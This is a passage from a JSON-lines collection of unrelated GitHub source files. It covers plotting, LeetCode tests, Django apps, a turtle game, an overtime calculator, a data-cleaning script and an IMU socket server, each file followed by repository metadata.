plt.text(new_data[p_i, 0], new_data[p_i, 1], p_i, fontsize=6) # , color=color, label=\"all_data\")\n \"\"\"\n\n #fig, axs = plt.subplots(len(pattern_indexes))\n\n # ==== draw all data of all patterns =======\n \"\"\"\n for i, p in enumerate(pattern_indexes):\n for p_i in p:\n axs[i].plot(x_train[p_i, :])\n axs[i].set_ylabel(\"motion index\")\n axs[i].set_xlabel(\"time\")\n #axs[i].set_title(\"pattern \" + str(i+1))\n \"\"\"\n # ==== draw the average of all patterns =======\n fig = plt.figure()\n print(pattern_indexes)\n for i, p in enumerate(pattern_indexes):\n patten_data = []\n for p_i in p:\n patten_data.append(x_train[p_i, :])\n patten_data = np.average(patten_data, axis=0)\n plt.plot(patten_data, label = \"pattern \" + str(i))\n plt.ylabel(\"motion index\")\n plt.xlabel(\"time\")\n\n\n # ==== draw all data with index for pattern 1 ======\n \"\"\"\n fig = plt.figure()\n for p_i in pattern_indexes[0]:\n plt.plot(x_train[p_i, :], label=str(p_i))\n plt.ylabel(\"motion index\")\n plt.xlabel(\"time\")\n \"\"\"\n # axs[i].set_title(\"pattern \" + str(i+1))\n #plt.title(\"Select data for each pattern\")\n plt.legend(loc=\"best\")\n # fig.savefig(save_path + \"VAE_embedding_\" + str(ic) + \".png\")\n plt.show()\n # fig.savefig(save_path + \"VAE_embedding.png\")\n #pickle.dump(fig, open(save_path + \"VAE_embedding.pickle\", \"wb\"))\n #plt.clf()","repo_name":"Seven-year-promise/HTScreening","sub_path":"Methods/PCA/draw_pattern.py","file_name":"draw_pattern.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"25544438918","text":"\"\"\"Unit tests of \"7. Reverse Integer\".\n\nhttps://leetcode.com/problems/reverse-integer/\n\"\"\"\n\nimport pytest\n\nfrom pyleetcode.medium.reverse_integer import Solution\n\n\nTEST_CASES = [\n (123, 321),\n (-123, -321),\n (120, 21),\n (0, 0),\n (1534236469, 0),\n (-2147483412, -2143847412),\n (2147483647, 0),\n (-1563847412, 0),\n]\n\n\n@pytest.mark.parametrize('x, output', TEST_CASES)\ndef test(x, output):\n res = Solution().process(x)\n assert res == output\n","repo_name":"ve-i-uj/leetcode","sub_path":"leetcode/pyleetcode/tests/test_medium/test_reverse_integer.py","file_name":"test_reverse_integer.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"9541220088","text":"# coding: utf-8\nimport pprint\nimport json\nyears = 2000\ncount_dict = {}\nid_list = set()\nid_name_dict = {}\nfor year in range(years, 2021+1):\n json_open = open(\n \"../data/{year}/JP_CREDITS.json\".format(year=year), \"r\", encoding=\"utf-8\")\n json_load = json.load(json_open)\n json_load = json_load[\"data\"]\n for json_about in json_load:\n if \"cast\" in json_about and len(json_about[\"cast\"]) != 0:\n allcast = []\n for json_cast in json_about[\"cast\"]:\n id_list.add(json_cast[\"id\"])\n id_name_dict[json_cast[\"id\"]] = json_cast[\"name\"]\n allcast.append(json_cast[\"id\"])\n allcast.sort()\n for i in range(len(allcast)-1): # ここらへん添え字だから許して\n if f\"{allcast[i]}\" not in count_dict:\n count_dict[f\"{allcast[i]}\"] = {}\n for j in range(i+1, len(allcast)):\n if f\"{allcast[j]}\" in count_dict[f\"{allcast[i]}\"]:\n count_dict[f\"{allcast[i]}\"][f\"{allcast[j]}\"] += 1\n else:\n count_dict[f\"{allcast[i]}\"][f\"{allcast[j]}\"] = 1\nid_list = sorted(list(id_list))\nnetwork_json = {\"id\": id_list, \"id_name\": id_name_dict, \"count\": count_dict}\n\n\nwith open('networkData.json', 'w', encoding=\"utf-8_sig\") as f:\n json.dump(network_json, f, ensure_ascii=False)\n\n# JSONファイルのロード\nwith open('networkData.json', 'r', encoding=\"utf-8_sig\") as f:\n json_output = json.load(f)\n","repo_name":"vdslab/tmdb-scraper","sub_path":"scripts/networkjson.py","file_name":"networkjson.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"69957785916","text":"from django.db.models import Q\nfrom django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom appPROJET.models import Specie, Ecosystem, Sheets\nfrom .forms import NewSpeciesForm\n\n\n# Show all observations in the database\ndef affichetable(request):\n \"\"\"Show all the entries in the database\"\"\"\n all_species_in_table = Specie.objects.all()\n return render(request, \"templates/appelfiches.html\", {\"species_table\": all_species_in_table})\n\n\n# Lookup for species that contain the given text in 'Nom_latin' field or (|) in 'Nom_vern' field\ndef show_especes(request, search_text):\n species = Specie.objects.filter(Q(Nom_latin=search_text) | Q(Nom_vern=search_text))\n print(species)\n return render(request, \"templates/sp.html\", {\"species\": species})\n\n\n# Lookup for all species in a specific ecosystem\ndef species_in_ecosystem(request, ecosystem_name):\n # /ecosystem/get/forest\n # Get the specific ecosystem via 'ecosystem_name'\n my_ecosystem = Ecosystem.objects.get(Name=ecosystem_name)\n # Find all the species associated with the SPECIFIC ecosystem (e.g., 'forest' -> loup, orchis mâle)\n species_in_ecosystem = my_ecosystem.species.all()\n return render(request, \"templates/speciesecosystem.html\", {\"species_in_ecosystem\": species_in_ecosystem})\n\n\n# Save a new species observation:\n@csrf_exempt\ndef new_species_form(request):\n # /createNewSpecies?Nom_latin=Buho&Nom_vern=Pardo&Date=19/07/2018&Observateur=Maria\n # \n nom_latin = request.GET.get('Nom_latin')\n nom_vern = request.GET.get('Nom_vern')\n date = request.GET.get('Date')\n observateur = request.GET.get('Observateur')\n localisation = request.GET.get('Localisation')\n ecosystem_name = request.GET.get('Ecosystem')\n\n # If the variables are created (are in the URL) then create the species entry in the database\n # 'if' checks if the variables are not empty.\n if nom_latin and nom_vern and date and observateur and ecosystem_name:\n\n # As ecosystem is a foreign key in the specie table, we need to use get or create which gives two variables : the new or not new (True or False) and the object\n # As it gives you two solutions, we need two variables ecosystem (the entry of the ecosystem name) and created(True or false)\n # By default\n\n ecosystem, created = Ecosystem.objects.get_or_create(Name=ecosystem_name)\n\n specie = Specie(\n Nom_latin=nom_latin,\n Nom_vern=nom_vern,\n Date=date,\n Observateur=observateur,\n )\n specie.save()\n\n # To add the object ecosystem (the entry from the html) as a foreign key of the specie(entry) that you just created and that will be saved in the table \"Specie\".\n # (Link two tables with a Many to Many relations)\n\n specie.ecosystems.add(ecosystem)\n\n # return redirect('/newSpecies')\n return render(request, 'success_add_species.html')\n\n # If not come back to the original form\n else:\n form = NewSpeciesForm()\n\n return render(request, 'especes.html', {'form': form})\n\n\n# Show all species sheets\ndef show_sheets(request):\n all_sheets_in_table = Sheets.objects.all()\n return render(request, \"templates/showsheets.html\", {\"sheets\": all_sheets_in_table})\n\n\n# Search one species sheet by both latin and vernacular name\ndef sheet_search(request, search_text):\n # To solve spaces problems in the :\n search_text = search_text.strip()\n\n sheets = Sheets.objects.filter(Q(Nom_latin=search_text) | Q(Nom_vern=search_text))\n\n return render(request, \"templates/sheetsearch.html\", {\"sheets\": sheets})\n","repo_name":"mtarinsancho/science_participative","sub_path":"appPROJET/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"74940591674","text":"import pytest\nfrom app import app\n\n\n@pytest.fixture\ndef client():\n with app.test_client() as client:\n yield client\n\n\n\n# Test for the /start_sitemap_scrap route\ndef test_start_processing(client):\n # Sample data to send with the POST request\n sample_data = {\n \"urls\": [\"http://example.com\", \"http://test.com\"],\n \"industryName\": \"Tech\"\n }\n\n # Sending POST request to start_processing endpoint with sample_data\n response = client.post('/start_sitemap_scrap', json=sample_data)\n\n # Parse the response data\n json_data = response.get_json()\n\n # Assert the status code and the returned message\n assert response.status_code == 200\n assert json_data[\"message\"] == \"Processing started, check back later for results.\"","repo_name":"ManuFU/GRIPSS-Webserver","sub_path":"tests/test_sitemap_scrap.py","file_name":"test_sitemap_scrap.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"20226053464","text":"def FrequencyMap(Text, k):\n freq = {}\n n = len(Text)\n for i in range(n-k+1):\n Pattern = Text[i:i+k]\n freq[Pattern] = 0\n if Pattern in freq:\n count = freq.get(Pattern)\n freq[Pattern] = count + 1\n else:\n freq[Pattern] = 1\n return freq\nText = \"CGCCTAAATAGCCTCGCGGAGCCTTATGTCATACTCGTCCT\"\nk = 3\ndef FrequencyMap2(Text, k):\n freq = {}\n n = len(Text)\n for i in range(n-k+1):\n Pattern = Text[i:i+k]\n freq[Pattern] = 0\n for j in range(n-k+1):\n if Pattern == Text[j:j+k]:\n freq[Pattern] +=1\n return freq\n\nprint(FrequencyMap2(Text,k))\n","repo_name":"Elephantus-Research/Bioinformatics-Notes","sub_path":"FrequencyMap.py","file_name":"FrequencyMap.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"20058942550","text":"import time\nfrom turtle import Screen\n\nimport car_manager\nfrom player import Player\nfrom car_manager import CarManager\nfrom scoreboard import Scoreboard, GameOver\n\nscreen = Screen()\nscreen.tracer(0)\nscreen.setup(width=600, height=600)\nscreen.bgcolor(\"black\")\ngame_over = GameOver()\n\nplayer = Player()\nscore_board = Scoreboard()\n\nscreen.listen()\nscreen.onkey(player.move, 'Up')\n\ngame_is_on = True\nall_cars = []\nrun_times = 0\nwhile game_is_on:\n time.sleep(0.1)\n if run_times % 6 == 0:\n new_car = CarManager()\n all_cars.append(new_car)\n screen.update()\n for car in all_cars:\n car.move()\n for car in all_cars:\n if car.distance(player) < 15:\n game_is_on = False\n run_times += 1\n if player.restart():\n player.reset()\n player.create_turtle()\n car_manager.STARTING_MOVE_DISTANCE += car_manager.MOVE_INCREMENT\n score_board.run_times += 1\n score_board.writing()\n\ngame_over.end_game()\nscreen.exitonclick()\n","repo_name":"IshaanBAgrawal/Day-23","sub_path":"Turtle crossing capstone project/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"26867157701","text":"# This is a sample Python script.\n\n# Press ⌃R to execute it or replace it with your code.\n# Press Double ⇧ to search everywhere for classes, files, tool windows, actions, and settings.\n\nimport openpyxl\nimport datetime\nimport chinese_calendar\n\n# 一天工作多少秒\nTOTAL_WORK_SECOND = 7.5 * 60 * 60\nLAUNCH_BREAK_SECOND = 1.5 * 60 * 60\n\nCOLUMN_DATE = 0\nCOLUMN_WEEK = 1\nCOLUMN_NAME = 2\nCOLUMN_ID = 3\nCOLUMN_TIME = 8\n\n\nclass workItem:\n def __init__(self):\n self.startTime = \"\"\n self.endTime = \"\"\n\n def reset(self):\n self.startTime = \"\"\n self.idValue = \"\"\n\n\nclass UserItem:\n def __init__(self, name, idValue):\n self.name = name\n self.idValue = idValue\n self.dict = {} # 打卡信息,key是日期,value是打卡list\n\n\n# 总的加班信息,key是员工账号, value是UserItem\nworkMap = {}\n\n\ndef isWeekend(dataStr):\n date = datetime.datetime.strptime(dataStr, \"%Y/%m/%d\")\n return chinese_calendar.is_holiday(date)\n\n\ndef calOverTimeReal(startTime, endTime):\n try:\n timeOne = datetime.datetime.strptime(startTime, '%H:%M')\n timeTwo = datetime.datetime.strptime(endTime, '%H:%M')\n except ValueError:\n return 0\n\n timeDiffSec = (timeTwo - timeOne).total_seconds()\n if timeOne.hour < 12:\n # 减去午休的时间\n timeDiffSec = timeDiffSec - LAUNCH_BREAK_SECOND\n\n return timeDiffSec\n\n\ndef getUserItemFromMap(idValue, nameValue):\n if idValue in workMap.keys():\n return workMap[idValue]\n else:\n valueItem = UserItem(nameValue, idValue)\n workMap[idValue] = valueItem\n return valueItem\n\n\ndef getWorkListFromUser(user_item, dateValue):\n if dateValue in user_item.dict.keys():\n return user_item.dict[dateValue]\n else:\n workList = []\n user_item.dict[dateValue] = workList\n return workList\n\n\ndef updateWorkData(user_item, dateValue, timeValue):\n workList = getWorkListFromUser(user_item, dateValue)\n workList.append(timeValue)\n\n\ndef calTotalWorkTime(workDic):\n totalSecond = 0\n keyList = []\n for key in workDic.keys():\n keyList.append(key)\n workList = workDic[key]\n if len(workList) >= 2:\n startTime = workList[0]\n endTime = workList[-1]\n time_real = calOverTimeReal(startTime, endTime)\n totalSecond = totalSecond + time_real\n\n totalMin = totalSecond // 60\n totalHour = totalMin // 60\n remainMin = totalMin % 60\n workResult = str(int(totalHour)) + \":\" + str(int(remainMin))\n mat = \"{:6}\\t{:10}\"\n mat_format = mat.format(\"总加班时长\", workResult)\n print(mat_format + \" 加班日期 \" + str(keyList))\n\n\ndef calculateResult():\n for value in workMap.values():\n mat = \"{:10}\\t{:12}\"\n print(mat.format(value.name, value.idValue), end=\"\")\n workDic = value.dict\n calTotalWorkTime(workDic)\n\n\ndef main():\n sourceFile = input(\"请输入考勤文件地址:\")\n # sourceFile = \"/Users/weigan/Downloads/7月考勤全员.xlsx\"\n workbook = openpyxl.load_workbook(sourceFile.strip(), read_only=True)\n sheet = workbook.worksheets[1]\n sheet.iter_rows(min_row=5)\n for row in sheet.iter_rows(min_row=5, values_only=True):\n dateValue = row[COLUMN_DATE]\n weekValue = row[COLUMN_WEEK]\n nameValue = row[COLUMN_NAME]\n idValue = row[COLUMN_ID]\n timeValue = row[COLUMN_TIME]\n if not isWeekend(dateValue):\n continue\n user_item = getUserItemFromMap(idValue, nameValue)\n updateWorkData(user_item, dateValue, timeValue)\n\n calculateResult()\n\n\nif __name__ == '__main__':\n main()\n\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","repo_name":"weidongjian/calOvertime","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"2899397524","text":"from django.conf.urls import url\r\nfrom . import views\r\nimport django.contrib.auth.views as auth_views\r\n\r\napp_name = 'collector'\r\nurlpatterns = [\r\n url('create/', views.ImageRecordCreateView.as_view(), name='create_record'),\r\n url(r'(?P\\d+)/update', views.ImageRecordUpdateView.as_view(), name='update_record'),\r\n url(r'login/', auth_views.LoginView.as_view(template_name='collector/login.html'), name='login'),\r\n url(r'logout/$', auth_views.LogoutView.as_view(), name=\"logout\"),\r\n url('', views.ImageRecordListView.as_view(), name='home'),\r\n \r\n]\r\n","repo_name":"zrenjie/Django","sub_path":"collector/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"13517903525","text":"import sys\nsys.stdin = open(\"input/01_input.txt\", \"r\")\n\nn, m = map(int, input().split())\na = list(map(int, input().split()))\nindex = 0\n\n\nfor i in range(len(a) - 1): \n smallest = 9999\n for j in range(i, len(a)):\n if smallest > a[j]:\n smallest = a[j]\n index = j\n a[i], a[index] = a[index], a[i]\n\nprint(a)\n\nfor i in range(len(a)):\n if a[i] == m:\n print(i+1)\n break\n","repo_name":"jaedeokhan/start-coding-test-pratice","sub_path":"Algorithm_problem_solving/python/section04/01_이분검색_P2.py","file_name":"01_이분검색_P2.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"39252843058","text":"import sys\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\ndef load_data(messages_filepath, categories_filepath):\n \"\"\"\n This function takes in two csv file paths and returns a combined DataFrame\n Args:\n messages_filepath: path to a csv containing messages\n categories_filepath: path to a csv containing categories about messages\n Returns:\n df: new DataFrame with combined input csv's\n \"\"\"\n messages = pd.read_csv(messages_filepath)\n categories = pd.read_csv(categories_filepath)\n df = messages.merge(categories, on=\"id\", how=\"outer\")\n return df\n\n\ndef clean_data(df):\n \"\"\"\n This function takes in a dataframe and cleans it so that the categories are\n in the desired format.\n Args:\n df: the DataFrame to be cleaned\n Returns:\n df: the cleaned DataFrame\n \"\"\"\n columns = [cat[:-2] for cat in df.loc[0, \"categories\"].split(\";\")]\n values = df[\"categories\"].str.split(';').map(lambda x: [val[-1:] for val in x]).tolist()\n categories = pd.DataFrame(values, columns=columns).apply(pd.to_numeric, axis=0)\n # some values were greater than 1, clip these to 1\n categories = categories.applymap(lambda x: 1 if x > 1 else x)\n df.drop(columns=\"categories\", inplace=True)\n df = pd.concat([df, categories], axis=1)\n df.drop_duplicates(inplace=True)\n return df\n\n\ndef save_data(df, database_filename):\n \"\"\"\n Function saves dataframe into a database.\n Args:\n df: DataFrame to save\n database_filename: location of SQLite Database to save to\n Returns:\n None\n \"\"\"\n engine = create_engine(f'sqlite:///{database_filename}')\n df.to_sql('message', engine, index=False, if_exists=\"replace\")\n\n\ndef main():\n if len(sys.argv) == 4:\n\n messages_filepath, categories_filepath, database_filepath = sys.argv[1:]\n\n print('Loading data...\\n MESSAGES: {}\\n CATEGORIES: {}'\n .format(messages_filepath, categories_filepath))\n df = load_data(messages_filepath, categories_filepath)\n\n print('Cleaning data...')\n df = clean_data(df)\n \n print('Saving data...\\n DATABASE: {}'.format(database_filepath))\n save_data(df, database_filepath)\n \n print('Cleaned data saved to database!')\n \n else:\n print('Please provide the filepaths of the messages and categories '\\\n 'datasets as the first and second argument respectively, as '\\\n 'well as the filepath of the database to save the cleaned data '\\\n 'to as the third argument. \\n\\nExample: python process_data.py '\\\n 'disaster_messages.csv disaster_categories.csv '\\\n 'DisasterResponse.db')\n\n\nif __name__ == '__main__':\n main()","repo_name":"gkap720/disaster-response","sub_path":"data/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"21291470907","text":"\"\"\" https://leetcode.com/problems/maximum-strictly-increasing-cells-in-a-matrix/\nData structure optimized DP, learn from: https://leetcode.cn/problems/maximum-strictly-increasing-cells-in-a-matrix/solution/dong-tai-gui-hua-you-hua-pythonjavacgo-b-axv0/\n\"\"\"\nfrom header import *\n\nclass Solution:\n def maxIncreasingCells(self, mat: List[List[int]]) -> int:\n g = defaultdict(list)\n for i, row in enumerate(mat):\n for j, x in enumerate(row):\n g[x].append((i, j)) # 相同元素放在同一组,统计位置\n\n ans = 0\n row_max = [0] * len(mat)\n col_max = [0] * len(mat[0])\n for _, pos in sorted(g.items(), key=lambda p: p[0]):\n # 先把最大值算出来,再更新 row_max 和 col_max\n mx = [max(row_max[i], col_max[j]) + 1 for i, j in pos]\n ans = max(ans, max(mx))\n for (i, j), f in zip(pos, mx):\n row_max[i] = max(row_max[i], f) # 更新第 i 行的最大 f 值\n col_max[j] = max(col_max[j], f) # 更新第 j 列的最大 f 值\n return ans","repo_name":"824zzy/Leetcode","sub_path":"K_DynamicProgramming/LongestSubsequence/L3_2713_Maximum_Strictly_Increasing_Cells_in_a_Matrix.py","file_name":"L3_2713_Maximum_Strictly_Increasing_Cells_in_a_Matrix.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"96"} +{"seq_id":"19603213553","text":"# SSL Certificate expiry check form.\n\nfrom wtforms import IntegerField, TextField\nfrom wtforms.validators import DataRequired, NumberRange\n\nfrom ..datacenter import DatacenterCheckForm\n\n\nclass CheckForm(DatacenterCheckForm):\n \"\"\"Creates a wtforms object for SSL Certificate check monitor.\"\"\"\n title = \"SSL: Certificate Expiration\"\n description = \"\"\"\nThis monitor will connect to a specified port on a specified Hostname/IP and validate the provided SSL Certificate is not expired. This monitor returns a False value if the expiration date is less than the \"Number of Days\" away. For example this monitor will be False 4 days from expiration date if the threshold is set to 5 and True 6 days from expiration date.\n \"\"\"\n\n placeholders = DatacenterCheckForm.placeholders\n placeholders.update({\n 'num_days' : '5',\n })\n\n hostname = TextField(\n 'Host',\n description=\"\"\"\n The hostname or IP address of the system to check\n \"\"\",\n validators=[DataRequired(message='Hostname is a required field.')])\n port = IntegerField(\n 'Port',\n description=\"\"\"\n The port number to connect to for SSL validation\n \"\"\",\n validators=[NumberRange(\n min=1, max=65536, message='Port number betweeen 1-65536')])\n num_days = IntegerField(\n 'Number of Days',\n description=\"\"\"\n Define the threshold of days before expiration to trigger monitor\n \"\"\",\n validators=[NumberRange(\n min=1, max=365, message='Warning threshold between 1 - 365 days')])\n\nif __name__ == '__main__':\n pass\n","repo_name":"Runbook/runbook","sub_path":"src/web/monitorforms/ssl-certificate-expiry/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":193,"dataset":"github-code","pt":"96"} +{"seq_id":"35212732057","text":"import logging\n\nfrom django.utils import timezone\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom mptt.models import MPTTModel, TreeForeignKey\n\nfrom product.models import Product\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_default_contacts():\n return {\n \"email\": \"\",\n \"address\": {\n \"country\": \"\",\n \"city\": \"\",\n \"street\": \"\",\n \"house_number\": \"\",\n },\n }\n\n\nclass Element(MPTTModel):\n class Type(models.IntegerChoices):\n FACTORY = 0\n DISTRIBUTOR = 1\n DEALERSHIP = 2\n RETAIL = 3\n IE = 4\n\n type = models.IntegerField(choices=Type.choices, default=Type.FACTORY)\n name = models.CharField(default=\"\", max_length=50)\n contacts = models.JSONField(default=get_default_contacts)\n products = models.ManyToManyField(Product, through=\"ElementProducts\")\n employees = models.ManyToManyField(User, through=\"ElementEmployees\")\n parent = TreeForeignKey(\"self\", on_delete=models.CASCADE, null=True, blank=True, related_name=\"children\")\n debt_to_supplier = models.DecimalField(default=0.00, max_digits=10, decimal_places=2)\n created_at = models.DateTimeField(default=timezone.now)\n\n class MPTTMeta:\n order_insertion_by = [\"name\"]\n\n def __str__(self):\n return f\"{self.name} | {self.type}\"\n\n def save(self, *args, **kwargs):\n if self.type == 0:\n self.parent = None\n super(Element, self).save(*args, **kwargs)\n elif not self.parent:\n logger.error(\"Required to select the previous level in the hierarchy.\")\n else:\n if self.parent.type >= self.type:\n logger.error(\n \"You can't add parent with a lower level in the hierarchy.\"\n )\n else:\n super(Element, self).save(*args, **kwargs)\n\n\nclass ElementProducts(models.Model):\n element = models.ForeignKey(Element, on_delete=models.CASCADE)\n product = models.ForeignKey(Product, on_delete=models.CASCADE)\n\n class Meta:\n db_table = \"element_products\"\n\n def __str__(self):\n return f\"{self.element.name} | {self.product.name}\"\n\n\nclass ElementEmployees(models.Model):\n element = models.ForeignKey(Element, on_delete=models.CASCADE)\n employee = models.ForeignKey(User, on_delete=models.CASCADE)\n\n class Meta:\n db_table = \"element_employees\"\n\n def __str__(self):\n return f\"{self.element.name} | {self.employee}\"\n","repo_name":"eeeelya/RocketData-test","sub_path":"sales_network/element/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"10044486758","text":"from http import client\nimport socket\nimport json\nimport imufusion\nimport numpy\nimport astropy\nfrom astropy.io import ascii\nfrom astropy.coordinates import EarthLocation, SkyCoord, AltAz\nfrom astropy import units\n\n\n# 根据输入的天体HR编号返回天体的RA与DES(北极星的HR编号是424)\n# 返回格式第一个项是RA, 第二个项是DES\ndef get_ra_and_des(hr_num):\n # 读取文件提取出对应行\n table = ascii.read(\"catalog\", readme=\"ReadMe\")\n table.add_index('HR')\n row = table.loc[hr_num]\n # 提取查询得到的RA和DES\n ret = []\n ret.append(str(row[table.index_column('RAh')])+'h'+str(row[table.index_column('RAm')])+'m'+str(row[table.index_column('RAs')])+'s')\n ret.append(str(row[table.index_column('DEd')])+'d'+str(row[table.index_column('DEm')])+'m'+str(row[table.index_column('DEs')])+'s')\n return ret\n\n\n# 根据输入天体的RA/DES, 海拔, 经度纬度与时间计算天体的地平坐标系坐标(北极星的HR编号是424)\n# 参数格式longitude和latitude均为角度, 东经为正,西经为负\n# 返回格式是第一个项是ALT, 第二个项是AZ\ndef get_skycoord(ra_des, longitude, latitude, height, time):\n # 构建观测者\n observer = EarthLocation(lat=latitude*units.deg, lon=longitude*units.deg, height=height*units.m)\n # 构建目标天体\n opt_target = SkyCoord(ra=ra_des[0], dec=ra_des[1], unit=(units.hourangle, units.deg))\n astropy.utils.iers.conf.auto_download = False\n astropy.utils.iers.conf.remote_timeout = 0.0\n astropy.utils.iers.conf.iers_degraded_accuracy = \"ignore\"\n astropy.utils.iers.conf.auto_max_age = None\n opt_pos = opt_target.transform_to(AltAz(obstime=time, location=observer))\n ret = [opt_pos.alt.deg, opt_pos.az.deg]\n return ret\n\n\ndef get_opt_altaz(hr_num, longitude, latitude, height, time):\n ra_des = get_ra_and_des(hr_num)\n return get_skycoord(ra_des, longitude, latitude, height, time)\n\n\n# 规定格式:\n# opt_alzat, 单位为角度,直接获得\n# gyro 长度为10的三维numpy.array, 顺序为x, y, z\n# acc 长度为10的三维numpy.array, 顺序为x, y, z\n# 返回值为int类型, 范围为[0, 255]\ndef get_diff_level(opt_altaz, gyro, acc, ahrs=imufusion.Ahrs()):\n for i in range(0, 25):\n ahrs.update_no_magnetometer(gyro[i, : ], acc[i, : ], 1 / 250)\n head_euler = ahrs.quaternion.to_euler()\n\n # print(head_euler)\n\n # head_euler[2] = yaw, head_euler[1] = pitch\n distance = numpy.arccos(numpy.cos(opt_altaz[0])*numpy.cos(head_euler[1])*numpy.cos(opt_altaz[1]-head_euler[2])+numpy.sin(opt_altaz[0])*numpy.sin(head_euler[0]))\n try:\n ret_value = int(abs(distance) / numpy.pi * 255)\n except ValueError:\n print(\"ValueError Exception RAISED\")\n return 0\n else:\n return ret_value\n\n\n#创建一个socket对象\nsocket_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nhost = \"192.168.217.30\"\nport = 9999\n#绑定地址\nsocket_server.bind((host, port))\n#设置监听\nsocket_server.listen(5)\n# socket_server.accept()返回一个元组, 元素1为客户端的socket对象, 元素2为客户端的地址(ip地址,端口号)\nclient_socket, address = socket_server.accept()\n\nflag = 1\nexcept_flag = 0\nopt_altaz = []\nret_value = 0\n\n#while循环是为了让对话持续\nwhile True:\n\t# 接收客户端的请求\n recvmsg = client_socket.recv(2048)\n # 把接收到的数据进行解码\n strData = recvmsg.decode(\"utf-8\")\n\n try:\n Data = json.loads(strData)\n except json.JSONDecodeError:\n print(\"Not Valide JSON data, return last ret_value\")\n except_flag = 1\n\n\n # 设置退出条件\n if strData == '':\n client_socket, address = socket_server.accept()\n elif except_flag == 0:\n # print(\"Recieve:\",Data)\n print(end=\"\")\n else:\n print(\"Not Valide JSON data, EXCEPTION RAISED\")\n \n\n if except_flag == 1:\n msg = str(ret_value) + '\\n'\n client_socket.send(msg.encode(\"utf-8\"))\n except_flag = 0\n else:\n # 输入\n if flag:\n opt_altaz = get_opt_altaz(424, 120.15, 30.25, 19.0, Data['time'])\n flag = 0\n # 接收数据处理\n\n # 处理陀螺仪数据\n pro_gyro = numpy.zeros((25, 3))\n for rows in range(25):\n for i in range(3):\n pro_gyro[rows][i] = Data['gyroData'][rows][i] / 4096\n # 处理加速度数据\n pro_acc = numpy.zeros((25, 3))\n for rows in range(25):\n for i in range(3):\n pro_acc[rows][i] = Data['accelData'][rows][i] / 16.384\n\n # print(pro_gyro)\n # print(pro_acc)\n ret_value = get_diff_level(opt_altaz, pro_gyro, pro_acc)\n print(ret_value)\n\n msg = str(ret_value) + '\\n'\n #发送数据,需要进行编码\n client_socket.send(msg.encode(\"utf-8\"))\n#关闭服务器端\nsocket_server.close()\n\n","repo_name":"CSWellesSun/StarSeeker","sub_path":"Server/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"7166829763","text":"from django.db import models, transaction\nimport enum\nimport datetime\nimport os\nimport csv\nimport uuid\nimport json\nfrom django.contrib.auth.models import User\n\n\nclass FileUploadModel(models.Model):\n class UploadStatus(models.IntegerChoices):\n PENDING = 1\n PROCESSED = 2\n FAILED = 3\n\n file_path = models.CharField(max_length=255)\n uploaded_by = models.ForeignKey(\"auth.User\", on_delete=models.SET_NULL, null=True)\n upload_date = models.DateTimeField(auto_now_add=True)\n upload_status = models.IntegerField(\n choices=UploadStatus.choices, default=UploadStatus.PENDING\n )\n processing_message = models.TextField(blank=True, null=True)\n num_records = models.PositiveIntegerField(default=0)\n start_date_time = models.DateTimeField(null=True)\n end_date_time = models.DateTimeField(null=True)\n\n @property\n def filename(self):\n return os.path.basename(self.filename)\n\n def create_file_upload_model(self, user_id, filepath):\n return FileUploadModel.objects.create(\n file_path=filepath, uploaded_by=User.objects.get(pk=user_id)\n )\n\n def mark_processed(self, num_records):\n self.upload_status = self.UploadStatus.PROCESSED\n self.end_date_time = datetime.datetime.now()\n self.num_records = num_records\n self.processing_message = None\n self.save()\n\n def mark_failed(self, message):\n self.upload_status = self.UploadStatus.FAILED\n self.processing_message = message\n self.save()\n\n def upload_json(self, body):\n self.start_date_time = datetime.datetime.now()\n customers = []\n num_records = 0\n\n try:\n with open(self.file_path, \"rb\") as f:\n decoded_file = json.load(f)\n\n for row in decoded_file:\n customer = Customer(\n first_name=row.get(\"first_name\", None),\n last_name=row.get(\"last_name\", None),\n national_id=row.get(\"national_id\", None),\n birth_date=row.get(\"birth_date\", None),\n address=row.get(\"address\", None),\n country=row.get(\"country\", None),\n 